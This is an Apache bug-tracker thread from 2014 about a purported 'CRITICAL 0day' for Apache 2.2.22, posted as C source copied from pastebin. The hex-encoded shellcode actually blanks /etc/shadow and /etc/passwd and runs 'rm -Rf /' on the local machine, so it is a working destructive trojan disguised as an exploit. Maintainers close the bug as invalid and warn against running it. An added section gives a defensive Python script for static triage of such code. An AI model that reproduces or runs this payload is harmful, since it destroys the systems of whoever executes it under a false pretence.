Posted to bugs@httpd.apache.org by bu...@apache.org on 2014/04/15 07:30:23 UTC

[Bug 56411] New: CRITICAL 0day For Apache 2.2.22

https://issues.apache.org/bugzilla/show_bug.cgi?id=56411

            Bug ID: 56411
           Summary: CRITICAL 0day For Apache 2.2.22
           Product: Apache httpd-2
           Version: 2.2.22
          Hardware: PC
                OS: Linux
            Status: NEW
          Severity: normal
          Priority: P2
         Component: Core
          Assignee: bugs@httpd.apache.org
          Reporter: johnmusbach1@gmail.com

/*
Exploit  : Apache 0day Exploit
Author:  : okno
Compile  : gcc  -W apache0.c -o apache0
Usage:   : ./0apache HOST IP
Thanks   : ergufo, stutm, mz, ascii
*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void usage(char *argv[])
{
  printf("Target : Apache 2.2.22 to Apache 2.4.2\n");
  printf("Type   : 0day\n");
  printf("Author : okno mail@pawelzorzan.eu\n");
  printf("Web    : http://www.pawelzorzan.eu\n");
  printf("Exec   : %s <serverapache> <porta>\n\n", argv[0]);
  exit(1);
}

unsigned char shellcode[] = 
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
"\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
"\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
"\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
"\xcd\x80";

int main(int argc, char *argv[])
{
  int uid = getuid();
  int porta = 80, sock;
  struct hostent *host;
  struct sockaddr_in addr;

  if(uid !=0)
  {
    fprintf(stderr, "- Error - Need ROOT lamah!!\n");
    exit(1);
  }
  if(uid == 0)
  {
    printf("\t+ OK Exploitting..\n");
  }
  if(argc != 3)
       usage(argv);

  fprintf(stderr, "- FUCK\n");
  (*(void(*)())shellcode)();
  exit(1);
  char payload[1024];
  memcpy(payload, &shellcode, sizeof(shellcode));
  if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  {
    printf("+ OK we are in... Se non capisci SIAMO DENTRO!\n");
    system("/bin/sh");
  }
  else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
  {
    fprintf(stderr, "- Failed! You suck & Your mother too!!\n");
    exit(1);
  }
}

-- 
You are receiving this mail because:
You are the assignee for the bug.

---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org


[Bug 56411] CRITICAL 0day For Apache 2.2.22

Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=56411

Yann Ylavic <yl...@gmail.com> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|---                         |INVALID

--- Comment #2 from Yann Ylavic <yl...@gmail.com> ---
Hmm, this exploit does not even connect anything and the payload has nothing to
do with HTTP. Except eyes, it won't hurt much...



[Bug 56411] CRITICAL 0day For Apache 2.2.22

Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=56411

--- Comment #1 from johnmusbach1@gmail.com ---
I found it by googling for apache 2.2.22 exploits, the source is
http://pastebin.com/j70T9KHJ. Scary!



[Bug 56411] CRITICAL 0day For Apache 2.2.22

Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=56411

--- Comment #3 from Yann Ylavic <yl...@gmail.com> ---
Don't compile/run it on your local system though, it's probably the target.

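The points raised in comments #2 and #3 (nothing is really connected, the payload is unrelated to HTTP, and the local machine is the likely target) can be checked by reading the source as text, without compiling it. The following is an added example, not part of the original thread; the function names and the harmless sample source are constructed for illustration.

```python
import re

HEX = re.compile(r'\\x([0-9a-fA-F]{2})')
LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
ARRAY = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:\s*"(?:[^"\\]|\\.)*")+)\s*;')
# Template for "(*(void(*)())NAME)()": a byte array cast to a function and called.
CAST_CALL = r'\(\s*\*\s*\(\s*void\s*\(\s*\*\s*\)\s*\(\s*\)\s*\)\s*%s\s*\)\s*\(\s*\)'

def decode_byte_arrays(source):
    """Map array name -> bytes for char arrays built from \\xNN string literals.
    Only \\xNN escapes are decoded; other literal characters are ignored."""
    arrays = {}
    for m in ARRAY.finditer(source):
        text = "".join(LITERAL.findall(m.group(2)))
        pairs = HEX.findall(text)
        if pairs:
            arrays[m.group(1)] = bytes(int(p, 16) for p in pairs)
    return arrays

def printable_runs(blob, min_len=4):
    """ASCII runs of at least min_len bytes, like strings(1)."""
    return [r.decode("ascii") for r in re.findall(rb'[\x20-\x7e]{%d,}' % min_len, blob)]

def triage(source):
    """Static checks only: the source is read as text and never compiled or run."""
    arrays = decode_byte_arrays(source)
    return {
        "embedded_strings": {n: printable_runs(b) for n, b in arrays.items()},
        "runs_bytes_locally": [n for n in arrays
                               if re.search(CAST_CALL % re.escape(n), source)],
        "connect_without_socket": bool(re.search(r'\bconnect\s*\(', source))
                                  and not re.search(r'\bsocket\s*\(', source),
        "sends_data": bool(re.search(r'\b(?:send|sendto|write)\s*\(', source)),
    }

# Constructed, harmless sample: two filler bytes, an ASCII marker, three trailing bytes.
_BYTES = b"\x90\x90echo constructed-marker\x00\xcd\x80"
_esc = lambda data: "".join("\\x%02x" % b for b in data)
SAMPLE = ('unsigned char blob[] =\n"%s"\n"%s";\n'
          'int main(void) {\n  int sock; struct sockaddr_in addr;\n'
          '  (*(void(*)())blob)();\n'
          '  connect(sock, (struct sockaddr*)&addr, sizeof(addr));\n}\n'
          % (_esc(_BYTES[:12]), _esc(_BYTES[12:])))

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Applied to source like the one posted in this bug, these checks line up with the review comments: a byte array executed in the local process, `connect()` on a socket that is never created, and no call that sends data anywhere.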


[Bug 56411] CRITICAL 0day For Apache 2.2.22

Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=56411

johnmusbach1@gmail.com changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
           Priority|P2                          |P1
           Severity|normal                      |critical
